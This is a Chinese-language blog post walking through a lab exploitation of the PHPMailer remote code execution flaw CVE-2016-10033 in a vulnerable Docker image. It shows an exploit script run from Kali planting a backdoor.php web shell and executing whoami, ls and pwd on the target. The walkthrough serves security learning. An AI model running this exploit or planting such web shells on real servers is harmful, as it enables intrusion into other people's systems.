PHPMailer < 5.2.18 遠程代碼執行漏洞(CVE-2016-10033)
阿新 • • 發佈:2017-11-10
com ifconf github cnblogs grep main src avi https
PHPMailer < 5.2.18 Remote Code Execution
本文將簡單展示一下PHPMailer遠程代碼執行漏洞(CVE-2016-10033)的利用過程,使用的是別人已經搭建好的docker環境,見參考鏈接。
實驗環境是在Ubuntu 16.04.3上,使用docker鏡像。
安裝和使用docker鏡像
首先需要在ubuntu上安裝docker,可使用如下命令進行安裝:
root@starnight:~# apt-get install docker.io 【安裝docker】 root@starnight:~# docker run --rm -it -p 8080:80 vulnerables/cve-2016-10033 AH00558: apache2: Could not reliably determine the server‘s fully qualified domain name, using 172.17.0.2. Set the ‘ServerName‘ directive globally to suppress this message ==> /var/log/apache2/access.log <== ==> /var/log/apache2/error.log <== [Thu Nov 09 15:11:47.0989172017] [mpm_prefork:notice] [pid 8] AH00163: Apache/2.4.10 (Debian) configured -- resuming normal operations [Thu Nov 09 15:11:47.101902 2017] [core:notice] [pid 8] AH00094: Command line: ‘/usr/sbin/apache2 -f /etc/apache2/apache2.conf‘ ==> /var/log/apache2/other_vhosts_access.log <==
安裝完docker之後,需要把相應的靶機環境下載(pull)下來,首次運行上面那條命令會下載docker鏡像,之後就會像上面運行的那樣,表明docker鏡像正在運行。
查看一下ip地址:
root@starnight:~# ifconfig | grep inet inet addr:172.17.0.1 Bcast:0.0.0.0 Mask:255.255.0.0 inet6 addr: fe80::42:4aff:fe88:49e5/64 Scope:Link inet addr:192.168.0.8 Bcast:192.168.0.255 Mask:255.255.255.0 inet6 addr: fe80::a7c0:e1f7:2118:7e6a/64 Scope:Link inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host inet6 addr: fe80::98a9:5bff:fe1f:b1c9/64 Scope:Link
這裏192.168.0.8是我們Ubuntu的ip地址,172.17.0.1是docker鏡像的內部地址,通過訪問http://192.168.0.8:8080/, 就能看到搭建好的存在漏洞的環境:
漏洞測試
接下來我們使用kali來進行測試, 下載exploit-CVE-2016-10033中的exploit.sh到本地,運行如下命令進行測試:
root@kali:~/penetest/CVE-2016-10033# ./exploit.sh 192.168.0.8:8080 [+] CVE-2016-10033 exploit by opsxcq [+] Exploiting 192.168.0.8:8080 [+] Target exploited, acessing shell at http://192.168.0.8:8080/backdoor.php [+] Checking if the backdoor was created on target system [+] Backdoor.php found on remote system [+] Running whoami www-data RemoteShell> ls [+] Running ls vulnerable RemoteShell> pwd [+] Running pwd /www
其實,並不是所有的命令運行都有回顯,比如說查看ip地址的命令ifconfig就看不到輸出。更多詳情,請參考下面的鏈接。
References
opsxcq/exploit-CVE-2016-10033
PHPMailer < 5.2.18 遠程代碼執行漏洞(CVE-2016-10033)